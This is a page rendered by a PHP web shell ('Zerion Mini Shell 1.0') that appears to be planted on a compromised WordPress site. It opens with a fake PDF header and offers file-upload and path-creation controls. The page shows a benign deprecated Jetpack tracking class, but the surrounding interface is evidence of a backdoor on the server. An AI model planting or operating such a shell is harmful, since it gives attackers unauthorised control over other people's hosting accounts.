%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/emergentqj/jugement/wp-content/plugins/jetpack/vendor/automattic/jetpack-compat/legacy/
Upload File :
Create Path :
Current File : /home/emergentqj/jugement/wp-content/plugins/jetpack/vendor/automattic/jetpack-compat/legacy/class.jetpack-tracks.php

<?php

use Automattic\Jetpack\Tracking;

class JetpackTracking {

	static function enqueue_tracks_scripts() {
		_deprecated_function( __METHOD__, 'jetpack-7.5', 'Automattic\Jetpack\Tracking' );

		$tracking = new Tracking();
		return $tracking->enqueue_tracks_scripts();
	}

	static function record_user_event( $event_type, $data = array(), $user = null ) {
		_deprecated_function( __METHOD__, 'jetpack-7.5', 'Automattic\Jetpack\Tracking' );

		$tracking = new Tracking();
		return $tracking->record_user_event( $event_type, $data, $user );
	}

}

Zerion Mini Shell 1.0